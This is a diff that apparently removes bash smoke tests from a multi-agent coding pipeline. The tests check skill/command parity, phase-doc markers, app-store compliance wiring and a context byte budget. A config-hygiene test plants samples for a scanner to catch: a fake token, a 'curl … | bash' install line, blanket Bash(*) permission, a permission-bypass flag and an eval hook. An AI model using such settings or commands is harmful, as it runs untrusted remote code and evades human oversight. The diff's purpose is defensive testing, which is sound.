- # allow the orchestrator skill to stand in.
44
- ORCHESTRATOR_COVERS=("help" "setup" "status" "log" "resume" "kill" "purge")
45
-
46
- orchestrator_covers() {
47
- for name in "${ORCHESTRATOR_COVERS[@]}"; do
48
- [ "$name" = "$1" ] && return 0
49
- done
50
- return 1
51
- }
52
-
53
- echo "→ Checking that every command has a corresponding skill"
54
- for cmd in $CMDS; do
55
- skill_dir="$SKILLS_DIR/multi-agent-$cmd"
56
- if [ -d "$skill_dir" ] && [ -f "$skill_dir/SKILL.md" ]; then
57
- pass "commands/multi-agent/$cmd.md ↔ skills/shared/multi-agent-$cmd/"
58
- elif orchestrator_covers "$cmd" && [ -f "$SKILLS_DIR/multi-agent/SKILL.md" ]; then
59
- pass "commands/multi-agent/$cmd.md covered by orchestrator skill (skills/shared/multi-agent/)"
60
- else
61
- fail "commands/multi-agent/$cmd.md has no matching skill"
62
- fi
63
- done
64
-
65
- echo ""
66
- echo "→ Checking that every multi-agent-* skill has a corresponding command"
67
- SKILLS=$(find "$SKILLS_DIR" -maxdepth 1 -type d -name "multi-agent-*" -exec basename {} \; | sed 's/^multi-agent-//' | sort)
68
-
69
- for skill in $SKILLS; do
70
- cmd_file="$CMDS_DIR/$skill/SKILL.md"
71
- # A few skills are Copilot-CLI-style conveniences without a Claude slash equivalent:
72
- case "$skill" in
73
- autopilot | dev-autopilot) # dash-style shortcut skills, the flags are documented in help.md
74
- pass "skills/shared/multi-agent-$skill/ is a Copilot flag shortcut (documented in help)"
75
- continue
76
- ;;
77
- esac
78
- if [ -f "$cmd_file" ]; then
79
- pass "skills/shared/multi-agent-$skill/ ↔ commands/multi-agent/$skill/SKILL.md"
80
- else
81
- fail "skills/shared/multi-agent-$skill/ has no matching command"
82
- fi
83
- done
84
-
85
- echo ""
86
- echo "══ commands-skills-parity smoke: $PASS passed, $FAIL failed ══"
87
- [ "$FAIL" -eq 0 ] || exit 1
@@ -1,75 +0,0 @@
1
- #!/usr/bin/env bash
2
- # smoke-community-gates.sh - v9.11.0
3
- #
4
- # Validates that the three community-sourced quality steps are wired into
5
- # their phase docs:
6
- # B1 code-simplifier pass -> phase-3-dev.md (diff shrink before Phase 4)
7
- # B2 lesson memory loop -> phase-4-review.md (root-cause lesson per fix round)
8
- # B3 cross-artifact check -> phase-2-planning.md (plan vs analysis, pre-approval)
9
- #
10
- # Without this, the steps can silently drop out of the phase docs during a
11
- # refactor and the pipeline regresses to bloated diffs, repeated root causes,
12
- # and plans that drift from the analysis.
13
- #
14
- # What this does NOT enforce:
15
- # - Runtime - that the agent actually runs the steps. This smoke catches
16
- # the prompt-side gap, same as smoke-tracker-contract.sh.
17
-
18
- set -euo pipefail
19
-
20
- REPO_ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
21
- PHASES_DIR="$REPO_ROOT/pipeline/multi-agent-refs/phases"
22
-
23
- PASS=0
24
- FAIL=0
25
- pass() { PASS=$((PASS + 1)); echo " ✓ $1"; }
26
- fail() { FAIL=$((FAIL + 1)); echo " ✗ $1"; }
27
-
28
- check() {
29
- local doc="$1" marker="$2" label="$3"
30
- local full="$PHASES_DIR/$doc"
31
- if [ ! -f "$full" ]; then
32
- fail "$doc missing"
33
- return
34
- fi
35
- if grep -qiF "$marker" "$full"; then
36
- pass "$doc: $label"
37
- else
38
- fail "$doc missing $label (marker: $marker)"
39
- fi
40
- }
41
-
42
- # ──────────────────────────────────────────────────────────────────────────
43
- echo "→ 1. B1 - code-simplifier pass in phase-3-dev.md"
44
- check "phase-3-dev.md" "Code-simplifier pass" "diff-shrink step heading"
45
- check "phase-3-dev.md" "Comment bloat" "comment-bloat smell"
46
- check "phase-3-dev.md" "Unrelated rewrites" "unrelated-rewrites smell"
47
- check "phase-3-dev.md" "Dead code" "dead-code smell"
48
- check "phase-3-dev.md" "Over-abstraction" "over-abstraction smell"
49
- check "phase-3-dev.md" "Re-run build + tests" "post-shrink build/test re-run"
50
- check "phase-3-dev.md" "dev.simplifier_pass" "cost-ledger metric for the subagent"
51
- check "phase-3-dev.md" "dispatching code-simplifier diff-shrink" "progress line"
52
-
53
- # ──────────────────────────────────────────────────────────────────────────
54
- echo ""
55
- echo "→ 2. B2 - lesson memory loop in phase-4-review.md"
56
- check "phase-4-review.md" "Lesson memory loop" "lesson step heading"
57
- check "phase-4-review.md" "learnings-ledger.mjs add" "ledger append invocation (existing store, no parallel store)"
58
- check "phase-4-review.md" "one-line root-cause lesson" "one-line root-cause contract"
59
- check "phase-4-review.md" "writing lesson to learnings ledger" "progress line"
60
-
61
- # ──────────────────────────────────────────────────────────────────────────
62
- echo ""
63
- echo "→ 3. B3 - cross-artifact consistency check in phase-2-planning.md"
64
- check "phase-2-planning.md" "Cross-artifact consistency check" "consistency step heading"
65
- check "phase-2-planning.md" "maps to at least one plan task" "requirement-coverage check"
66
- check "phase-2-planning.md" "No plan task without an analysis anchor" "anchor-integrity check"
67
- check "phase-2-planning.md" "Open-question carry-over" "open-question carry-over check"
68
- check "phase-2-planning.md" "revise the plan ONCE" "single-revision rule"
69
- check "phase-2-planning.md" "Consistency gaps" "remaining-gaps surfacing banner"
70
- check "phase-2-planning.md" "checking plan-vs-analysis consistency" "progress line"
71
-
72
- # ──────────────────────────────────────────────────────────────────────────
73
- echo ""
74
- echo "══ community-gates smoke: $PASS passed, $FAIL failed ══"
75
- [ "$FAIL" -eq 0 ]
@@ -1,119 +0,0 @@
1
- #!/usr/bin/env bash
2
- # smoke-compliance-skills.sh - v5.8.0+ store-ready compliance skills contract.
3
- #
4
- # Verifies the two compliance skills are consistent with their documentation and
5
- # that the 4 claimed consumer surfaces actually reference them (not just promise).
6
- #
7
- # Covers:
8
- # 1. apple-archive-compliance/SKILL.md exists, has frontmatter, 18-rule catalog,
9
- # EN + TR humanizer blocks, severity table, prerequisite detection.
10
- # 2. google-play-compliance/SKILL.md exists, has frontmatter, 21-rule catalog
11
- # across 4 categories, EN + TR humanizer blocks, severity table, prereq detection.
12
- # 3. sim-test.md has "store-ready" scenario branch with platform detection.
13
- # 4. security-auditor.md cites both skills in a cross-reference subsection.
14
- # 5. review.md + multi-agent-review/SKILL.md cite both skills.
15
- # 6. channels.md + multi-agent-channels/SKILL.md have auto-augmentation logic
16
- # that reads cached JSON reports.
17
-
18
- set -euo pipefail
19
-
20
- HERE="$(cd "$(dirname "$0")" && pwd)"
21
- ROOT="$(cd "$HERE/../.." && pwd)"
22
-
23
- APPLE_SKILL="$ROOT/pipeline/skills/shared/core/apple-archive-compliance/SKILL.md"
24
- GOOGLE_SKILL="$ROOT/pipeline/skills/shared/core/google-play-compliance/SKILL.md"
25
- SIM_TEST="$ROOT/pipeline/commands/sim-test.md"
26
- SEC_AUDITOR="$ROOT/pipeline/agents/security-auditor.md"
27
- REVIEW_CMD="$ROOT/pipeline/commands/multi-agent/review/SKILL.md"
28
- REVIEW_SKILL="$ROOT/pipeline/skills/shared/core/multi-agent-review/SKILL.md"
29
- CHANNELS_CMD="$ROOT/pipeline/commands/multi-agent/channels/SKILL.md"
30
- CHANNELS_SKILL="$ROOT/pipeline/skills/shared/core/multi-agent-channels/SKILL.md"
31
-
32
- PASS=0
33
- FAIL=0
34
- pass() { PASS=$((PASS+1)); echo " ✓ $1"; }
35
- fail() { FAIL=$((FAIL+1)); echo " ✗ $1"; }
36
-
37
- for f in "$APPLE_SKILL" "$GOOGLE_SKILL" "$SIM_TEST" "$SEC_AUDITOR" "$REVIEW_CMD" "$REVIEW_SKILL" "$CHANNELS_CMD" "$CHANNELS_SKILL"; do
38
- [ -f "$f" ] || { echo "error: missing $f" >&2; exit 1; }
39
- done
40
-
41
- echo "→ 1. apple-archive-compliance SKILL.md frontmatter + catalog shape"
42
- grep -q "^name: apple-archive-compliance$" "$APPLE_SKILL" && pass "apple frontmatter name" || fail "apple frontmatter name"
43
- grep -q "^user-invocable: true$" "$APPLE_SKILL" && pass "apple user-invocable" || fail "apple user-invocable"
44
- grep -q "argument-hint:" "$APPLE_SKILL" && pass "apple argument-hint" || fail "apple argument-hint"
45
- # Count rule rows in the catalog table (excluding header + separator)
46
- APPLE_RULES=$(awk '/^## 18-Rule Catalog/,/^## Severity mapping/' "$APPLE_SKILL" | grep -cE '^\| *[0-9]+ *\|' || true)
47
- [ "$APPLE_RULES" -eq 18 ] && pass "apple catalog has 18 rule rows" || fail "apple catalog has $APPLE_RULES rule rows (want 18)"
48
-
49
- echo "→ 2. apple skill humanizer blocks EN + TR + severity table"
50
- # v8.2 split humanizer language from picker language: gating moved from
51
- # `promptLanguage == "en"|"tr"` (locked to "en") to the per-run `--lang=` flag.
52
- grep -qE '^### EN .*--lang=en' "$APPLE_SKILL" && pass "apple EN humanizer block present" || fail "apple EN humanizer missing"
53
- grep -qE '^### TR .*--lang=tr' "$APPLE_SKILL" && pass "apple TR humanizer block present" || fail "apple TR humanizer missing"
54
- grep -qE '\| *`error` *\|' "$APPLE_SKILL" && pass "apple severity table has error row" || fail "apple severity error row"
55
- grep -qE '\| *`warning` *\|' "$APPLE_SKILL" && pass "apple severity table has warning row" || fail "apple severity warning row"
56
- grep -qE '\| *`info` *\|' "$APPLE_SKILL" && pass "apple severity table has info row" || fail "apple severity info row"
57
-
58
- echo "→ 3. apple skill prerequisite detection + archive resolution (v8.4.0+ uses dev-toolkit-mcp)"
59
- grep -q 'ios_app_store_audit' "$APPLE_SKILL" && pass "apple references ios_app_store_audit MCP tool" || fail "apple ios_app_store_audit reference missing"
60
- grep -q '.xcarchive' "$APPLE_SKILL" && pass "apple references .xcarchive" || fail "apple .xcarchive missing"
61
- grep -q '@mmerterden/dev-toolkit-mcp' "$APPLE_SKILL" && pass "apple references @mmerterden/dev-toolkit-mcp package" || fail "apple dev-toolkit-mcp reference missing"
62
- grep -q 'mcp__dev-toolkit__ios_app_store_audit' "$APPLE_SKILL" && pass "apple shows MCP-call invocation form" || fail "apple MCP-call invocation form missing"
63
-
64
- echo "→ 4. google-play-compliance SKILL.md frontmatter + catalog shape"
65
- grep -q "^name: google-play-compliance$" "$GOOGLE_SKILL" && pass "google frontmatter name" || fail "google frontmatter name"
66
- grep -q "^user-invocable: true$" "$GOOGLE_SKILL" && pass "google user-invocable" || fail "google user-invocable"
67
- grep -q "argument-hint:" "$GOOGLE_SKILL" && pass "google argument-hint" || fail "google argument-hint"
68
- GOOGLE_RULES=$(awk '/^## 21-Rule Policy Catalog/,/^## Severity mapping/' "$GOOGLE_SKILL" | grep -cE '^\| *[0-9]+ *\|' || true)
69
- [ "$GOOGLE_RULES" -eq 21 ] && pass "google catalog has 21 rule rows" || fail "google catalog has $GOOGLE_RULES rule rows (want 21)"
70
-
71
- echo "→ 5. google catalog has 4 categories (A Technical / B Security / C Privacy / D Hygiene)"
72
- grep -q "^### A\. Technical requirements" "$GOOGLE_SKILL" && pass "google A Technical category" || fail "google A Technical missing"
73
- grep -q "^### B\. Security" "$GOOGLE_SKILL" && pass "google B Security category" || fail "google B Security missing"
74
- grep -q "^### C\. Privacy" "$GOOGLE_SKILL" && pass "google C Privacy category" || fail "google C Privacy missing"
75
- grep -q "^### D\. Release hygiene" "$GOOGLE_SKILL" && pass "google D Hygiene category" || fail "google D Hygiene missing"
76
-
77
- echo "→ 6. google skill humanizer blocks EN + TR"
78
- grep -qE '^### EN .*--lang=en' "$GOOGLE_SKILL" && pass "google EN humanizer block present" || fail "google EN humanizer missing"
79
- grep -qE '^### TR .*--lang=tr' "$GOOGLE_SKILL" && pass "google TR humanizer block present" || fail "google TR humanizer missing"
80
-
81
- echo "→ 7. google skill tool orchestration"
82
- grep -q 'bundletool' "$GOOGLE_SKILL" && pass "google references bundletool" || fail "google bundletool missing"
83
- grep -q 'aapt2' "$GOOGLE_SKILL" && pass "google references aapt2" || fail "google aapt2 missing"
84
- grep -q 'apksigner' "$GOOGLE_SKILL" && pass "google references apksigner" || fail "google apksigner missing"
85
- grep -q '.aab' "$GOOGLE_SKILL" && pass "google references .aab" || fail "google .aab missing"
86
-
87
- echo "→ 8. sim-test.md store-ready scenario branch"
88
- grep -q 'store-ready' "$SIM_TEST" && pass "sim-test mentions store-ready" || fail "sim-test missing store-ready"
89
- grep -q 'apple-archive-compliance' "$SIM_TEST" && pass "sim-test dispatches apple skill" || fail "sim-test missing apple dispatch"
90
- grep -q 'google-play-compliance' "$SIM_TEST" && pass "sim-test dispatches google skill" || fail "sim-test missing google dispatch"
91
- grep -q '\.xcodeproj' "$SIM_TEST" && pass "sim-test platform-detects .xcodeproj" || fail "sim-test missing .xcodeproj detect"
92
- grep -q 'build\.gradle' "$SIM_TEST" && pass "sim-test platform-detects build.gradle" || fail "sim-test missing build.gradle detect"
93
-
94
- echo "→ 9. consumer wiring - security-auditor (both catalogs)"
95
- grep -q 'apple-archive-compliance' "$SEC_AUDITOR" && pass "security-auditor references apple skill" || fail "security-auditor apple reference missing"
96
- grep -q 'google-play-compliance' "$SEC_AUDITOR" && pass "security-auditor references google skill" || fail "security-auditor google reference missing"
97
- grep -qE 'Info\.plist|PrivacyInfo|entitlements' "$SEC_AUDITOR" && pass "security-auditor lists iOS trigger files" || fail "security-auditor iOS trigger files missing"
98
- grep -qE 'AndroidManifest|build\.gradle|proguard' "$SEC_AUDITOR" && pass "security-auditor lists Android trigger files" || fail "security-auditor Android trigger files missing"
99
-
100
- echo "→ 10. consumer wiring - /multi-agent:review (both CLIs)"
101
- grep -q 'apple-archive-compliance' "$REVIEW_CMD" && pass "review.md cites apple catalog" || fail "review.md apple reference missing"
102
- grep -q 'google-play-compliance' "$REVIEW_CMD" && pass "review.md cites google catalog" || fail "review.md google reference missing"
103
- grep -q 'apple-archive-compliance' "$REVIEW_SKILL" && pass "review SKILL.md cites apple catalog" || fail "review SKILL.md apple missing"
104
- grep -q 'google-play-compliance' "$REVIEW_SKILL" && pass "review SKILL.md cites google catalog" || fail "review SKILL.md google missing"
105
-
106
- echo "→ 11. consumer wiring - /multi-agent:channels auto-augmentation"
107
- grep -q 'archiveguard-.*\.json' "$CHANNELS_CMD" && pass "channels.md reads cached archiveguard JSON" || fail "channels.md archiveguard cache missing"
108
- grep -q 'play-compliance-.*\.json' "$CHANNELS_CMD" && pass "channels.md reads cached play-compliance JSON" || fail "channels.md play-compliance cache missing"
109
- grep -qE 'Store compliance|store compliance' "$CHANNELS_CMD" && pass "channels.md has Store compliance section" || fail "channels.md Store compliance section missing"
110
- grep -q 'archiveguard-.*\.json' "$CHANNELS_SKILL" && pass "channels SKILL.md reads archiveguard cache" || fail "channels SKILL.md archiveguard cache missing"
111
- grep -q 'play-compliance-.*\.json' "$CHANNELS_SKILL" && pass "channels SKILL.md reads play-compliance cache" || fail "channels SKILL.md play-compliance cache missing"
112
- grep -qE 'Store compliance|store compliance' "$CHANNELS_SKILL" && pass "channels SKILL.md has Store compliance section" || fail "channels SKILL.md Store compliance section missing"
113
-
114
- echo "→ 12. apple skill writes the cache filename channels.md reads (producer↔consumer agreement)"
115
- grep -q 'archiveguard-\$\$\.json\|archiveguard-{pid}\.json' "$APPLE_SKILL" && pass "apple skill writes /tmp/archiveguard-*.json (matches channels glob)" || fail "apple skill cache filename does NOT match channels glob - store-compliance auto-augmentation will silently never trigger"
116
-
117
- echo ""
118
- echo "══ compliance-skills smoke: $PASS passed, $FAIL failed ══"
119
- [ "$FAIL" -eq 0 ]
@@ -1,58 +0,0 @@
1
- #!/usr/bin/env bash
2
- # smoke-config-hygiene.sh - contract for scan-agent-config.sh.
3
- #
4
- # 1. The real shipped surface must be clean (exit 0).
5
- # 2. A fixture tree with planted-bad configs must be caught (exit 1, HIGH findings).
6
- # Detection matters: a hygiene gate that never fires is worthless.
7
- #
8
- # Exit 0 = all pass, 1 = any failure.
9
-
10
- set -uo pipefail
11
-
12
- ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
13
- SCANNER="$ROOT/pipeline/scripts/scan-agent-config.sh"
14
- [ -f "$SCANNER" ] || { echo "FAIL: scanner missing" >&2; exit 1; }
15
-
16
- PASS=0; FAIL=0
17
- pass() { PASS=$((PASS+1)); echo " ✓ $1"; }
18
- fail() { FAIL=$((FAIL+1)); echo " ✗ $1"; }
19
-
20
- echo "→ 1. real shipped surface is clean"
21
- if bash "$SCANNER" >/dev/null 2>&1; then pass "real surface exits 0"; else fail "real surface flagged (unexpected)"; fi
22
-
23
- echo "→ 2. planted-bad fixture is caught"
24
- TMP="$(mktemp -d)"; trap 'rm -rf "$TMP"' EXIT
25
- mkdir -p "$TMP/install/templates" "$TMP/pipeline/agents" "$TMP/pipeline/scripts"
26
-
27
- # a fake (non-real) token that matches the high-signal prefix rule
28
- FAKE_TOKEN="ghp_$(printf 'A%.0s' $(seq 1 36))"
29
- cat > "$TMP/pipeline/preferences-template.json" <<EOF
30
- { "token": "$FAKE_TOKEN", "install": "curl https://x.example/i.sh | bash" }
31
- EOF
32
-
33
- # bad hooks template: blanket Bash(*), bypass flag, and an eval-bearing hook cmd
34
- cat > "$TMP/install/templates/claude-hooks.json" <<'EOF'
35
- {
36
- "permissions": { "allow": ["Bash(*)"] },
37
- "skipDangerousModePermissionPrompt": true,
38
- "hooks": { "PreToolUse": [ { "matcher": "Bash(git commit:*)",
39
- "hooks": [ { "type": "command", "command": "bash -c \"eval $(cat x)\"" } ] } ] }
40
- }
41
- EOF
42
- : > "$TMP/pipeline/agents/placeholder.md"
43
-
44
- OUT="$(SCAN_ROOT="$TMP" bash "$SCANNER" 2>&1 || true)"
45
- CODE=$?
46
- # under set -e off, capture exit explicitly
47
- SCAN_ROOT="$TMP" bash "$SCANNER" >/dev/null 2>&1; CODE=$?
48
-
49
- [ "$CODE" -eq 1 ] && pass "fixture exits 1 (blocking)" || fail "fixture did not block (exit $CODE)"
50
- echo "$OUT" | grep -q "\[HIGH\].*secret" && pass "detects hardcoded secret" || fail "missed secret"
51
- echo "$OUT" | grep -q "\[HIGH\].*bypass" && pass "detects permission bypass" || fail "missed bypass flag"
52
- echo "$OUT" | grep -q "\[HIGH\].*hook" && pass "detects eval-bearing hook cmd" || fail "missed bad hook command"
53
- echo "$OUT" | grep -q "\[MEDIUM\].*Bash" && pass "detects blanket Bash(*)" || fail "missed blanket Bash"
54
- echo "$OUT" | grep -q "\[MEDIUM\].*curl|bash\|pipe-to-shell" && pass "detects curl|bash" || fail "missed curl|bash"
55
-
56
- echo ""
57
- echo "══ config-hygiene smoke: $PASS passed, $FAIL failed ══"
58
- [ "$FAIL" -eq 0 ]
@@ -1,72 +0,0 @@
1
- #!/usr/bin/env bash
2
- #
3
- # smoke-context-budget.sh - the bytes every pipeline run pays before it starts.
4
- #
5
- # core/multi-agent/SKILL.md plus multi-agent-refs/rules.md load on every run of
6
- # every mode, whatever the task. They were 67150 bytes together, roughly 17k
7
- # tokens spent before the first phase, because the orchestrator skill had grown
8
- # its own inline copies of things that already existed as loadable references -
9
- # the log-file template (whose copy had gone stale and named a path the code no
10
- # longer uses), the help text the multi-agent-help skill owns, and a component
11
- # generation guide that only applies to design tasks.
12
- #
13
- # A budget nobody measures only moves one way, so this pins it. The ceiling is
14
- # the measured value plus a small margin: enough to add a paragraph, not enough
15
- # to move a chapter back in. Lowering it is always fine.
16
- #
17
- # Exit codes: 0=within budget, 1=over, 2=a tracked file is missing
18
-
19
- set -euo pipefail
20
-
21
- REPO_ROOT="$(cd "$(dirname "$0")/../.." && pwd)"
22
-
23
- # The files loaded unconditionally at run start.
24
- TRACKED="
25
- pipeline/skills/shared/core/multi-agent/SKILL.md
26
- pipeline/multi-agent-refs/rules.md
27
- "
28
-
29
- # Measured 57289 after the split. 60000 leaves ~2.7 kB of headroom.
30
- CEILING=${CONTEXT_BUDGET_CEILING:-60000}
31
-
32
- PASS=0
33
- FAIL=0
34
- pass() { PASS=$((PASS + 1)); echo " ✓ $1"; }
35
- fail() { FAIL=$((FAIL + 1)); echo " ✗ $1"; }
36
-
37
- echo "→ 1. every tracked file exists"
38
- TOTAL=0
39
- for rel in $TRACKED; do
40
- f="$REPO_ROOT/$rel"
41
- if [ ! -f "$f" ]; then
42
- echo " ✗ missing: $rel"
43
- echo " a tracked file that vanished makes the budget meaningless"
44
- exit 2
45
- fi
46
- n=$(wc -c < "$f" | tr -d ' ')
47
- TOTAL=$((TOTAL + n))
48
- pass "$rel ($n bytes)"
49
- done
50
-
51
- echo "→ 2. fixed per-run load is within budget"
52
- if [ "$TOTAL" -le "$CEILING" ]; then
53
- pass "fixed load $TOTAL bytes, ceiling $CEILING"
54
- else
55
- fail "fixed load $TOTAL bytes exceeds the $CEILING ceiling by $((TOTAL - CEILING))"
56
- echo " Move detail into multi-agent-refs/ and point at it, rather than"
57
- echo " raising the ceiling. Every byte here is paid by every run."
58
- fi
59
-
60
- echo "→ 3. the orchestrator points at the references instead of copying them"
61
- SKILL="$REPO_ROOT/pipeline/skills/shared/core/multi-agent/SKILL.md"
62
- REFS=$(grep -c "multi-agent-refs" "$SKILL" || true)
63
- if [ "$REFS" -ge 3 ]; then
64
- pass "orchestrator cites multi-agent-refs $REFS times"
65
- else
66
- fail "orchestrator cites multi-agent-refs only $REFS time(s)"
67
- echo " It carried zero citations while duplicating three of those files."
68
- fi
69
-
70
- echo ""
71
- echo "══ smoke-context-budget: $PASS passed, $FAIL failed ══"
72
- [ "$FAIL" -gt 0 ] && exit 1 || exit 0